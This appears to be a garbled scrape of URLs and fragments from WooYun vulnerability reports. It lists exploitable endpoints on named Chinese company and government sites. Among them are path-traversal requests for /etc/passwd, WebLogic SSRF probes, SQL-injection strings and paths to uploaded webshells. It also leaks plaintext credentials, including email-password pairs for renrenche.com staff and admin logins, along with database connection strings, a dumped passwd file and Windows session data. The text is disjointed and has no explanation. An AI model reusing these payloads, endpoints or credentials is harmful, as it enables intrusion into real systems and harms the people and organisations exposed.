http://**.**.**.**/index.php?r=archives/research/new&id=6802&t=1443190140 http://**.**.**.**/index.php?r=member/default/content&id=5531&t=1441623678网盘信息页面 http://**.**.**.**/login.asp http://duyun.loupan.com/index.php?apartments=0&area=628&c=house&decorate=1&existing=0&feature=829&keywords=e&m=get_house_combox_list&page=2&price=0-2000&property=7&state=5&subway=0 intitle:Acenter http://**.**.**.**/ http://**.**.**.**/ http://1 http://114.215.194.8:8080/fridge/login_loginAction.action http://120.204.232.131:8089/GetUnit.aspx?RmtpId=0001&service=api_getUnitRmtp&UnitId=0001 http://sqlmap.org http://eip.crcchem.com/page/element/news/more.jsp?eid=4721 http://eip.crcchem.com/page/element/news/more.jsp?eid=4721 http://**.**.**.**/sz_class.asp?id=1 http://**.**.**.**/sx_class.asp?id=1 http://**.**.**.**/other.asp?id=1 ttp://**.**.**.**/news.asp?id=395 http://**.**.**.**/kc_class.asp?id=3 http://**.**.**.**/class.asp?id=51 http://union.51.com http://union.51.com http://career.crc.com.cn http://career.crc.com.cn/hrjob/front/getImgSrc.do?filename=/app/upload/hrjob/temp/1444359198577.jpg http://career.crc.com.cn/hrjob/front/download.do?filePath=/app/upload/hrjob/photo/9513920151009110437666.jspx&fileName=one.jspx http://career.crc.com.cn/hrjob/getDownloadFile_resumesearch.do?filePath=/etc/passwd&fileName=passwd http://**.**.**/ http://shop.homeinns.com http://shop.homeinns.com/member/MyAddress/Manage/42713?OpType=Edit https://121.15.129.252/resin-admin/index.php http://**.**.**.**/axis2/ https://**.**.**.**/login admin:axis2 wsdl:definitions xmlns:wsdl="http://**.**.**.**/wsdl/ xmlns:ns1="http://org.apache.axis2/xsd xmlns:ns="http://**.**.**.** xmlns:ax27="http://**.**.**.**/xsd xmlns:wsaw="http://**.**.**.**/2006/05/addressing/wsdl xmlns:ax25="http://**.**.**.**/xsd xmlns:http="http://**.**.**.**/wsdl/http/ xmlns:xs="http://**.**.**.**/2001/XMLSchema xmlns:mime="http://**.**.**.**/wsdl/mime/ xmlns:soap="http://**.**.**.**/wsdl/soap/ 
xmlns:soap12="http://**.**.**.**/wsdl/soap12/ http://**.**.**.** wsdl:documentation wsdl:documentation wsdl:types xs:schema http://**.**.**.**/xsd xs:complexType xs:sequence xs:complexType xs:schema xs:schema http://**.**.**.**/xsd xs:complexType xs:sequence xs:element xs:string"/ xs:element xs:string"/ xs:element xs:string"/ xs:element xs:float"/ xs:element xs:string"/ xs:sequence xs:complexType xs:schema xs:schema xmlns:ax28="http://**.**.**.**/xsd xmlns:ax26="http://**.**.**.**/xsd http://**.**.**.** xs:import http://**.**.**.**/xsd"/ xs:import http://**.**.**.**/xsd"/ xs:element xs:complexType xs:sequence http:address http://**.**.**.**/axis2/services/MonitiseServices.MonitiseServicesHttpEndpoint/"/ wsdl:port wsdl:service wsdl:definitions http://www.yeehang.cc/main.aspx#我们打开发现是一个oa系统 http://**.**.**.**/wp-config.php~ http://**.**.**.**/wp-config.php~ http://**.**.**.**/Editing_wp-config.php http://ebooking.lvmama.com/ http://ebooking.lvmama.com/vst_ebooking/ebooking/super_order/hotel/orderck.do?ebkTaskId=83902&actionType=select http://ebooking.lvmama.com/vst_ebooking/ebooking/super_order/hotel/orderck.do?ebkTaskId=81900&actionType=select http://ebooking.lvmama.com/vst_ebooking/ebooking/super_order/hotel/orderck.do?ebkTaskId=81100&actionType=select http://ebooking.lvmama.com/vst_ebooking/ebooking/announcement/announcementFiledownLoad.do?fileId=6619365 http://ebooking.lvmama.com/vst_ebooking/ebooking/announcement/announcementFiledownLoad.do?fileId=6619364 http://ebooking.lvmama.com/vst_ebooking/ebooking/announcement/announcementFiledownLoad.do?fileId=6619363 http://www.xadai.com/UF/Uploads/MemberData/ http://**.**.**.**:8080/opac_two/detail?code=1256&name=%E5%B7%A5%E7%A8%8B%E7%AE%A1%E7%90%86 http://**.**.**.**:8080/opac_two/detail?code=030106&name=%E8%AF%89%E8%AE%BC%E6%B3%95%E5%AD%A6 https://github.com/allen0115/mybatis-generator-maven/blob/b2c5439f38fb8cd524814c943e339f70746273e3/target/classes/META-INF/maven/nfd/mg/pom.xml ysql://112.74.197.103:3***** 
http://bbs.wxrb.com/vote/index.php?a=list&voteid=4 http://www.eleweike.com/index.php?a=news&tid=1 http://**.**.**.**/government/ http://**.**.**.**/ http://**.**.**.**:7001/console/login/LoginForm.jsp http://**.**.**.**/mainSkool/mainSkool.php http://job.51.com http://job.51.com/sz/search?key=e&new=1 http://jbk.39.net/phpmyadmin/main.php http://m.zhinanmao.com/tripapi/order?order_id=2532 http://click.99.com/static.php?channel=20016&web_id=2303663&kind=1 http://**.**.**.**/xmxx.asp?id=193 http://**.**.**.**/xmxx.asp?id=193 http://**.**.**.** http://www.cf40.org.cn/jinrong/zhuanti.php?id=10044 http://rdscm.midea.com.cn:7008//uddiexplorer/SearchPublicRegistries.jsp http://rdscm.midea.com.cn:7008//uddiexplorer/SetupUDDIExplorer.jsp http://rdscm.midea.com.cn:7008//uddiexplorer/SearchPublicRegistries.jsp?operator=http://172.16.16.142:22&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search http://rdscm.midea.com.cn:7008//uddiexplorer/SearchPublicRegistries.jsp?operator=http://172.16.16.142:24&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search http://rdscm.midea.com.cn:7008//uddiexplorer/SearchPublicRegistries.jsp?operator=http://172.16.16.1:22&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search http://**.**.**.**/index.php?rSite/Index&sysPageId=141202171042413 http://**.**.**.**/upload/download.php?id=123 http://www.24gtd.com/ http://www.600373.net/mainpages/vedio.aspx?LessType=MD102 http://**.**.**.**/download.jsp?filename=../../../../../../../etc/passwd http://**.**.**.**/bugs/wooyun-2015-0144084 http://dz.loupan.com/ index.php/house/ajax_set_support/?s=0.025794034590944648 http://dz.loupan.com URL:http://report.brandwisdom.cn/phpinfo.php URL:http://wap.brandwisdom.cn/log.txt http://42.62.67.17:8080/.git/config http://hc.brandwisdom.cn/.git/config http://hotel.brandwisdom.cn/.git/config 
http://report.brandwisdom.cn/.git/config http://www.brandwisdom.cn/.git/config http://www.freebuf.com/tools/66096.html http://cio.zdnet.com.cn/ http://**.**.**.**/bugs/wooyun-2015-0136712进行测试发现的。 http://**.**.**.** http://bbs.ejiayu.com/uc_server/admin.php http://**.**.**.** https://**.**.**.**/idp/Authn/UserPassword http://open.lianwifi.com/ http://**.**.**.**:80/cms/columncount.jsp?urls=http://**.**.**.**/ http://**.**.**.**/Web_XXXX.aspx?InfoID=3e56f6f0-e777-4ff1-bfaf-d691c8f1ab9f http://**.**.**.**/Web_XXXX.aspx?InfoID=3e56f6f0-e777-4ff1-bfaf-d691c8f1ab9f'and http://**.**.**.**/Web_XXXX.aspx?InfoID=3e56f6f0-e777-4ff1-bfaf-d691c8f1ab9f'and www.redflag-linux.com http://**.**.**.** http://**.**.**.**/st/login.aspx http://**.**.**/ http://218.28.234.62:8080/index.aspx http://218.28.234.62:8080/index.aspx http://123.15.56.100:8080/Index.aspx http://123.15.56.100:8080/Index.aspx http://**.**.**.**/liulc/kgwz/manager/login.asp http://**.**.**.**/liulc/kgwz/xxzx_view.asp?id=1564 http://gxzyy.91huayi.com/Login/Login.aspx com:7890/easoa/login/kingdee_sso_auth.jsp com:7890 http://ploy.infobird.com:8080/ploy/code/config.ini http://ploy.infobird.com/ http://main.jiajiaozaixian.com/bussinesstudentuserinfo/turnUsercenterStudentUserinfo.action?type=02&idstr=660D52A5075A9768261DA8AA8A879B7A http://**.**.**.**/about/news/news_view.php?id=273 http://**.**.**.**/bugs/wooyun-2010-0144999 http://**.**.**.**/ http://**.**.**.**/articles/?do=view&l=299&catalog_id=367&article_id=891 http://**.**.**.**/articles/?do=view&l=299&catalog_id=367&article_id=891 http://**.**.**.** http://**.**.**.**/server/tsg/lib_ml.asp Data:txtUser=1&txtPass=1 Data:B2=%EF%BF%BD%EF%BF%BD%D1%AF&txtName=1 http://tj.g.pptv.com/click.php?t=reurl&gid=qfz&sid=7&cid=4&ccid=18&url=http://baidu.com http://www.chebao.com.cn:80/index.php/Content/faqList/id/8 http://www.piaozhijia.cn/feedback/queryFeedbackList www.piaozhijia.cn http://**.**.**.**/NewsCategory.aspx?strClass=%E6%96%B0%E9%97%BB%E5%BF%AB%E8%AE%AF 
http://**.**.**.**:8808/ewebeditor/admin/default.asp http://**.**.**.**/jyga/ewebeditor/admin/default.asp http://**.**.**.**/wysga/AMHtmlEditor/admin/default.asp http://**.**.**.**/AMHtmlEditor/admin/default.asp http://**.**.**.**/AMHtmlEditor/admin/default.asp http://**.**.**.**:73/AMHtmlEditor/admin/default.asp http://**.**.**.**/ewebeditor/admin/default.asp http://**.**.**.**/jyga/ http://**.**.**.**/jyga/AMHtmlEditor/admin/default.asp http://**.**.**.**/jyga/ewebeditor/admin/default.asp http://**.**.**.**/jyga/AMHtmlEditor/db/ewebeditor.mdb http://**.**.**.**/jyga/ewebeditor/db/ewebeditor.mdb http://**.**.**.**/jyga/AMHtmlEditor/admin/upload.asp?id=8&d_viewmode=&dir=../ http://**.**.**.**/jyga/ewebeditor/uploadfile/201510/20151009151521893.asp http://scan.safe.baidu.com/.svn/entries http://image.meilele.com/images/201510/1444397806464.php http://image.meilele.com/images/201510/1444397828700.html http://weblogic:7001/cuss/index.jsp http://域名/Tur.php?hid= http://**.**.**.**/tur.php?hid=24 http://**.**.**.**/Tur.php?hid=1 http://www.atax.biz/Tur.php?hid=1 http://www.xohxoh.biz/tur.php?hid=6 http://**.**.**.**/new/mtv/tur.php?hid=1 http://**.**.**.**/tur.php?hid=1 http://**.**.**.**/Tur.php?hid=1 http://**.**.**.**/tur.php?hid=24 http://**.**.**.**/sousou.aspx?title=123 http://**.**.**.**/sousou.aspx?title=123 http://**.**.**.** http://yinyue.kuwo.cn http://oa.fosun.com/ http://www.xxoo.com/tools/SWFUpload/upload.jsp height:20px;BORDER http://**.**.**.**/news_more.asp?bigclassid=80&articleid=5334 http://**.**.**.**/news_more.asp?bigclassid=123&articleid=6814 http://**.**.**.**/news_more.asp?bigclassid=88&articleid=926 http://**.**.**.**/news_more.asp?bigclassid=111&articleid=4218 http://**.**.**.**/news_more.asp?bigclassid=108&articleid=4791 http://**.**.**.**/news_more.asp?bigclassid=81&articleid=1114 http://**.**.**.**/news_more.asp?bigclassid=88&articleid=965 http://**.**.**.**/news_more.asp?bigclassid=74&articleid=2879 
http://**.**.**.**/news_more.asp?bigclassid=74&articleid=2173 http://**.**.**.**/news_more.asp?bigclassid=61&articleid=4882 http://**.**.**.**/news_more.asp?bigclassid=74&articleid=1756 http://**.**.**.**/bugs/wooyun-2010-0132010 http://bbs.2345.cn/ http://confluence.**.**.**.**/ http://confluence.**.**.**.**/pages/viewpage.action?pageId=2162706&src=search http://confluence.**.**.**.**/pages/viewpage.action?pageId=5966667 http://community.apicloud.com/bbs.zip http://m.baidu.com/ http://**.**.**.**/ www.R**.**.**.** http://localhost/index.php?s=/Home/cancel/index http://220.194.29.181/seigys/logonAction.do,如图所示: http://220.194.29.181/seigys/logonAction.do http://**.**.**.**/ http://**.**.**.**:7002/console/login/LoginForm.jsp http://**.**.**.**:7002/LM/login/login.jsp http://**.**.**.**:7002/LM/pages/ydcx/index.jsp http://**.**.**/ http://**.**.**.**:8001/cK/foot.jsp http://**.**.**.**/newsPage.php?big=2&nt=17&ns=4691 http://**.**.**.**:9090/CMADoc/apply_userapply.action?userid=存在命令执行漏洞 www.geely.com http://www.glbpay.com/ http://uatwechat.pkufi.com/pkufi_uat/ http://kh.infobird.com/login http://mobile.chinaiiss.com/strategy/v3/news/get_newsinfo?newsid=50483 Id:0;368625 Package:NTLM User:Administrator Domain:WIN-7NPQ8AEVO1F Id:0;996 Package:Negotiate User:WIN-7NPQ8AEVO1F$ Domain:WORKGROUP Id:0;997 Package:Negotiate User:LOCAL Id:0;213869 Package:NTLM http://**.**.**.**/Reception/evaluation-1.html http://study.**.**.**.**/Educational/dk_RegUser.aspx http://study.**.**.**.** http://**.**.**.**/Content.aspx?id=119234181908 http://**.**.**.**/ewebeditor/admin/login.aspx http://**.**.**.**/service/news_details.php?pkey=1749 http://**.**.**.**/service/news_details.php?pkey=1749 http://**.**.**.**/s/ir_alerts.php http://**.**.**.**/hk/alert_loggedin.php?clientid=810,看来克莉丝汀客户号是810。 http://**.**.**.**/html/index.php?clientid=810 http://**.**.**.**/works_type.php?u=7 http://xing.cada.cn:20052/Login/Index http://**.**.**.**/display02/center.asp?organizeID=73 
http://**.**.**.**/display02/center.asp?organizeID=73 http://**.**.**.**/display02/sandyLogin.asp http://**.**.**.**/ListIndex.asp?OneId=1 http://**.**.**.**/admin/Login.asp http://**.**.**.**/bugs/wooyun-2015-0135332 http://**.**.**.**:8080/manage/upload/upload.html http://**.**.**.**:8080/manage/upload/lyzx_image.jsp http://**.**.**.**/ http://**.**.**.**/bugs/wooyun-2014-080193 www.***.com/Article/ www.***.com/Article/admin.asp http://e.faw-vw.com/ http://e.faw-vw.com Injection:http://**.**.**.**/2013/zj/storyitem.php?id=1408 http://m.faw-vw.com/autoparts/show?car=7002&keyword=1 https://www.creditwe.com/htmlreg.do http://**.**.**.**/whitehats/%E6%9C%AB%E7%AC%94%E4%B8%B6) http://**.**.**.**/bugs/wooyun-2010-068088 http://**.**.**.**/pg/newpage/login.aspx http://**.**.**.**/pg/newpage/login.aspx http://**.**.**.**/NewPage/Login.aspx http://**.**.**.**/NewPage/Login.aspx http://**.**.**.**:8300/NewPage/Login.aspx http://**.**.**.**/NewPage/loginSso.aspx?ReturnUrl=%2fDefault.aspx http://218.56.138.156:8080/web/manager/ http://218.56.138.156:8080/web/servlet/vistor?type=vistorBuilding&agentNo=123456 http://218.56.138.156:8080/web/servlet/vistor?type=vistorBuilding&agentNo=654321 http://**.**.**.**:8080/ http://**.**.**.**/share/home?uk=1849117482&view=share#category/type=0 http://**.**.**.**/s/1dDChn4t http://www.siti.com.cn/hr.php?act=search&fid=42&fup=8 http://www.airjiatu.com/admin/login/login.php http://**.**.**.**/ http://www.dongfeng-honda.com/honda_mediaReport.php?nid=-1+OR+17-7%3d10 http://weixin.union.appchina.com/index.php?s=/Home/User/login.html http://www.zte-v.com.cn/robots.txt http://**.**.**.**/ViewBuildChart.aspx?ldid=@@version http://**.**.**.**:8000/ViewBuildChart.aspx?ldid=@@version http://**.**.**.**:8000/ViewBuildChart.aspx?ldid=@@version https://m.nongfadai.com/checkUser.html http://218.93.120.202:89/manager/login.do http://www.61.com/v1/ 
https://github.com/handong106324/sqLogWeb/blob/e4b3815ecbbb1714386ca8d60640f3809dfffa20/WebRoot/WEB-INF/classes/mail_config_zh_CN.properties jdbc:mysql://124.248.40.5:3306/wh_log jdbc:mysql://10.100.151.93:58306/wahu_operation jdbc:mysql://117.121.22.23:30031/wh_log jdbc:mysql://127.0.0.1:3306/wh_log MSG_SERVER_IP:117.121.17.11 MSG_SERVER_IP:10.20.41.86 MSG_SERVER_IP:210.242.234.86 HAIWAIFLAG:true isByKey:true HANGUO_WH:false INTERNATIONAL_NEED:true https://github.com/search?p=2&q=zhuwenxuan%40baidu.com++username&ref=searchresults&type=Code&utf8=%E2%9C%93 https://email.baidu.com https://mytoken.baidu.com/mytoken.jsp http://**.**.**.**/tc/self_guided_tour_detail.php?id=20 http://**.**.**.**/cms/ http://**.**.**.**/images/Icon/conf1.php https://github.com/ouyx/ordersys3/blob/98809b64f3e3b1d8318c695ea0f346e0d54d0f4f/application/libraries/mailer.php http://**.**.**.**/index.aspx http://u.ctrip.com/union/sitemanage/ChangeHeaderFooter_NewByDistribution.aspx http://**.**.**.**:8088/HDQYTX/qiyeyhxx/qiyeyhxx!yonghu_zhuce.action存在命令执行漏洞 http://**.**.**.**:8888/config/pstarUser.aspx http://**.**.**.**:10088/config/pstarUser.aspx http://info.himin.com http://info.himin.com/messageAction!toSubSug.action http://api.joyoung.com:8089/ia/appfiles/2015/06/30/f66c88cd3d804f75b4ad9a191763fbe6.bin(该地址已经失效) http://m.iiyi.com/fk/ http://www.yp900.com/Admin_Buy/getAdInfo.ashx?areaid=8&classid=23&random= http://**.**.**.**/jyjb/downview.jsp?id=3046 http://**.**.**.**/party/zxzx/index.jsp?id=47561 http://**.**.**.**/zxzx/list.jsp?order= http://**.**.**.**/zyjs/ejz.jsp?id=060000 http://**.**.**.**/zxzx/jump.jsp?id=47477 http://**.**.**.**/newview/result.jsp http://**.**.**.**/Account/LogOn http://**.**.**.**/bugs/wooyun-2010-0134095 http://mallcoo.cn/aboutus.html http://mallcoo.cn/ http://42.120.7.150:17000/ https://42.120.7.150/svn/ http://d.mallcoo.cn http://d.mallcoo.cn:8980/index.php http://**.**.**.**/uppic/3431211201011469_2.gif http://**.**.**.**/admin/ercblogin.asp 
http://webmail.tcl.com http://magazine.tcl.com/ http://magazine.tcl.com/Default.aspx http://magazine.tcl.com http://oa.hupu.com:88/seeyon/management/index.jsp bbs.hupu.com/U1kxcUs4Z0gySg.php https://tower.im/ http://58.56.225.218:8080/hmweb/docs/login.jsp http://58.56.225.218:8080/hmweb/login.action http://58.56.225.218:8080/hmweb/login.action http://mail2011.steelhome.cn/login.php?Lang=../../../../../../../../../../etc/passwd%00.jpg http://www.dfzt.com.cn/上海东方证券资本投资有限公司系东方证券股份有限公司专业直接投资机构。 http://www.dfzt.com.cn/i5808/,随便一试admin:admin成功进入 http://www.cits.cn/marketing/APP/2wm/index.html http://**.**.**.**/getSpxx.action?flid=1903&page=2 http://**.**.**.**:8080/icarttw/getSpxx.action?flid=1884&page=1&type=3&flmc=U%E7%9B%98 http://**.**.**.**:8090/getSpxx.action?flid=1665&page=1&type=4 www.familymart.com.cn右上角进入集享卡: http://125.67.64.82:8081 http://125.67.64.82:8081 http://www.uxin.com/ http://**.**.**.**、http://**.**.**.**,IP分别为:**.**.**.** http://**.**.**.**/book/dzbook_list.php?bcate=sk&cid=17 http://www.dfpv.com.cn/fs/pressroom_retrieve/1444378873.html http://**.**.**.**/ mail:wanghong@renrenche.com----renrenche@123 mail:zhangtingting@renrenche.com----renrenche@123 mail:wanglu@renrenche.com----renrenche@123 http://p-rrc.ccic2.com/app/login.jsp http://hr.himin.net/ http://www.wandoujia.com/apps/com.nongfadai.android http://**.**.**.**/sys/Article/case/ http://**.**.**.**/DSOA_TY/goods/GoodsAdd.aspx?goodsid=1&flag=2 http://**.**.**.**/DSOA_TY/goods/GoodsAdd.aspx?goodsid=1&flag=2 http://**.**.**.**/OA//goods/GoodsAdd.aspx?goodsid=1&flag=2 http://**.**.**.**/dsoa_xhwj/goods/GoodsAdd.aspx?goodsid=1&flag=2 http://**.**.**.**/DSOA_TY/FromBaoShan/LaborSpecial/PlacardView.aspx?info_id=1 http://**.**.**.**/DSOA_TY/FromBaoShan/LaborSpecial/PlacardView.aspx?info_id=1 http://**.**.**.**/OA/FromBaoShan/LaborSpecial/PlacardView.aspx?info_id=1 http://**.**.**.**/dsoa_xhwj/FromBaoShan/LaborSpecial/PlacardView.aspx?info_id=1 
http://**.**.**.**/data/AjaxService.aspx?method=selectypml&pageSize=10&pageIndex=1&n= http://rb.tcl.com/admin http://rb.tcl.com/upload/image/201510/36ba2604-feb6-4e22-ab8c-3b24e414affa.jspx http://**.**.**.**/mtait/login.jsp http://**.**.**.**/mtait/dataCollection/dataCollectionQuery!input.do encap:Ethernet B8:CA:3A:6A:A9:74 baca:3aff:fe6a:a974/64 Scope:Link MTU:1500 packets:273706886 packets:717697366 txqueuelen:1000 http://jira.25pp.com/ http://kf.touzhu.cn/Web/ScoreHis.aspx http://**.**.**.**/lnmp/lnmp1.2.tar.gz http://116.255.245.4/ http://116.255.245.4/First.aspx?__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE= http://**.**.**.**/bugs/wooyun-2010-098403 http://**.**.**.**/admin http://**.**.**.**/upload/image/201510/36ba2604-feb6-4e22-ab8c-3b24e414affa.jspx http://**.**.**.**/bugs/wooyun-2010-0103604 www.class.cn http://wooyun.org/bugs/wooyun-2015-0128244 http://enterprisehw.com/showlocalnews.php?id=441 http://**.**.**.**:9001/qdweb/realweb/index.jsp http://**.**.**.**:8001/czhouse/Login.jsp http://**.**.**.**:9001/console/login/LoginForm.jsp http://**.**.**.**/Core/Skin/Login.aspx http://**.**.**.**/login.aspx user:A0008 PASS:207106 http://**.**.**.**//uploadfiles/201510/1.aspx http://**.**.**.**/ http://**.**.**.**/bocadmin/ http://**.**.**.** http://**.**.**.** http://222.174.54.118:8088 http://222.174.54.118:8088/office.aspx http://222.174.54.118:8088/office.aspx?code=CC&name=%E9%95%BF%E6%98%A5%E5%88%86%E5%85%AC%E5%8F%B8 http://222.174.54.118:8088/office.aspx http://hanbanoa.open.com.cn http://mobile.chinaiiss.com/strategy/v3/user/login https://**.**.**.**/visa188/visa/blob/c54cd3e8ffa879176d5112cebad937b05cc9c8d2/src/main/resources/conf/jdbc.properties jdbc:mysql**.**.**.**:3306/visa?useUnicode=true&autoReconnect=true&characterEncoding=UTF-8 jdbc:mysql**.**.**.**:3306/visa?useUnicode=true&autoReconnect=true&characterEncoding=UTF-8 bdbrowser://newtab域中,有个常用网址功能,但是没有对title进行有效处理,导致XSS。设置常用网址,只需要给用户一个网址,发现只要在页面中设置js多reload几次就能自动存留在这个popup 
http://127.0.0.1/browser/test.js http://**.**.**.** http://**.**.**.**:9000/index_jzytj.jsp http://**.**.**.**:9000/i/oem/grpslogin.jsp http://**.**.**.**:9000/console/login/LoginForm.jsp http://**.**.**.**/bugs/wooyun-2010-0113172 http://**.**.**.**:7001/console/login/LoginForm.jsp http://**.**.**.**:7003/console/login/LoginForm.jsp http://gd.189.cn/biz/introd/infor/xxaq/2011/10/18/10083.htm http://**.**.**.**/login.aspx http://**.**.**.**/login.aspx jimmy:00000000 LO:drwclo http://**.**.**.**/ http://cc.bnchina.com/newsdetails.aspx?id=94 http://jl.bnchina.com/newsdetails.aspx?id=94 http://channels.wandoujia.com/Android http://channels.wandoujia.com/Android/daily?action=b3V0&num=MTI=&id=MTYzMw== http://channels.wandoujia.com/Android/daily?action=b3V0&num=OA==&id=MTU2OQ== http://channels.wandoujia.com/Android/daily?action=b3V0&num=NA==&id=NzUz http://channels.wandoujia.com/Android/daily?action=b3V0&num=Mw==&id=Njc3 http://channels.wandoujia.com/Android/daily?action=b3V0&num=Ng==&id=MTQwMw== http://channels.wandoujia.com/Android/daily?action=b3V0&num=MjA=&id=MTU5NQ== http://**.**.**.**:80/ http://cn.gpspax.com/loginRCZX.aspx http://**.**.**.**/index.aspx http://**.**.**.**/index.aspx?id=42041&n=ZHANGPENG&p=GU2S0P251db0104 http://**.**.**.**:80/ http://**.**.**.**/soft/34970.htm http://111.4.123.233/ http://**.**.**.**/shownews.php?ID=787 http://**.**.**.**/console/login/LoginForm.jsp http://**.**.**.**/test/da.jsp jdbc:oracle:thin:@localhost:1521/orcl http://shop.kingsun.cn/到处都是注入,而且还爆错 http://**.**.**.**/bugs/wooyun-2010-0135197 http://**.**.**.**/public/Project/ProjectInfo.aspx?code=259002&lcode=430369 http://ts.kuwo.cn/.git/ http://**.**.**.**/user/Reg.aspx),填入手机号(18600008888)、任意验证码(123456)、邮箱等信息,提交。 http://112.87.43.215:8020/ http://**.**.**.** http://**.**.**.**/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=/File http://**.**.**.**/Specialreport.jsp?t_id=946&tableName=bd_xinwe241 
http://**.**.**.**/newcontent.jsp?messId=1239&tableName=bd_xinwe241 http://**.**.**.**/manage/infordisclosure/topicdetails.jsp?map=y&messId=27&tableName=bd_xinxi648 http://**.**.**.**/law_details.jsp?id=10021&diccode=1002 http://**.**.**.**/sdmessage.jsp?messId=117&tableName=bd_shand306 http://**.**.**.**/ http://**.**.**.**/dc/admin/index.asp http://**.**.**.**/dc//inc/config.asp jdbc:oracle:thin:@**.**.**.**:1521/orcl http://**.**.**.**:86/zjz/peixun/Banci.do?method=xuzhi&banciId=441&userId=&year=2015&flag=all http://**.**.**.**/star/index.php?type=3 http://www.job168.com/df/index.jsp?title=%EF%BF%BD%EF%BF%BD%CD%B7 http://www.job168.com/df/index.jsp?title=%EF%BF%BD%EF%BF%BD%CD%B7 http://bbs.job168.com/df/index.jsp?title=%B6%AB%DD%B8 http://hz.job168.com/paper/e_show.jsp?issue_no=279&page_name=B1&photo=photo_thumb http://hz.job168.com/train/searchresult.jsp?course_type=A0000 http://**.**.**.**/ http://**.**.**.**/news/details.do?id=e6c417c5-ab94-4dd1-d1b6-36a740eb5ca0 http://**.**.**.**:8888/esale/news.action存在命令执行漏洞 http://api.ffan.com/film/v2/film/lists?cityNo=320100&imei=525af1deaf994570ae27070eb4b8b0f064d3ef4c&userId=15000000009411631&version=1&wdId=db9f5185ab0beb3c4b6ea459952918c2&FFClientVersion=21010&ddId=525af1deaf994570ae27070eb4b8b0f064d3ef4c&FFClientType=2&publishStatus=1 http://**.**.**.**/whir_system/Default.aspx# http://**.**.**.**/bugs/wooyun-2010-057764 http://**.**.**.**/uploadfiles/20151011025928865.asp http://**.**.**.**/unit/list.asp?uid=29 http://**.**.**.**/zhengfawang/login.asp http://m.qmango.com/travel/searchresult?pclass=0&sortby=1&sortdir=0&ss=-1&ty= http://epaper.uestc.edu.cn/admin/login http://epaper.uestc.edu.cn/admin/ http://epaper.uestc.edu.cn/admin/ http://**.**.**.**/ http://**.**.**.**:7001/console/login/LoginForm.jsp http://**.**.**.**/qyks/Dcard.asp http://**.**.**.**:7002/console/login/LoginForm.jsp root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin 
adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin uuidd:x:101:104:UUID daemon:/var/lib/libuuid:/sbin/nologin pegasus:x:66:65:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin oracle:x:500:500::/home/oracle:/bin/bash http://222.75.160.45/ http://www.metromall.cn/)账户口令可被任意重置。 http://www.metromall.cn//user/forgot_pw_one.aspx)。 
http://**.**.**.**/GE/GE/default.aspx(復興航空B2B系統) http://**.**.**.**/GE/GE/PG/HE/HEP2/HEP2B0/HEP2B0.aspx?AJAX=1&do_action=agt_cd_check&agt_cd=dsfsd*&acct_no=aa&_ele_list=XML&time=1444493269143 http://**.**.**.**:8088/unismEtm/login_val.action http://**.**.**.**:8084/unismEtm/login_val.action http://**.**.**.**:8092/unismLtk/login_val.action http://**.**.**.**:8080/unismOPS/login_val.action http://**.**.**.**/caiotAqu/login_val.action http://**.**.**.**/ http://**.**.**.**/caiotLiv/login_val.action http://**.**.**.**/caiotAqu/login_val.action http://**.**.**.**/caiotAqu/login_val.action http://**.**.**.**/caiotAqu/shell.jsp http://**.**.**.**/caiotAqu/ma.jsp http://**.**.**.**:8092/unismLtk/login_val.action http://**.**.**.**:8092/unismLtk/caac.jsp https://**.**.**.**/treejames/uninetOps/blob/d68489b97c51b723f8f4ebbda79d80391f7b53c5/WebRoot/WEB-INF/classes/application.properties jdbc:mysql://localhost:3306/tt http://**.**.**.**/bugs/wooyun-2015-0145964/trace/bc9f3329aff4b653b44137a8f62542c8 http://**.**.**.**/ http://**.**.**.**/bugs/wooyun-2010-057764下载到数据库配置文件,可得到数据库链接信息: http://3gapi.baidukanshu.com:7778 http://**.**.**.**/ http://**.**.**.**/OA/ http://**.**.**.**/OA/ http://**.**.**.**/OA/ http://**.**.**.**/OA/ 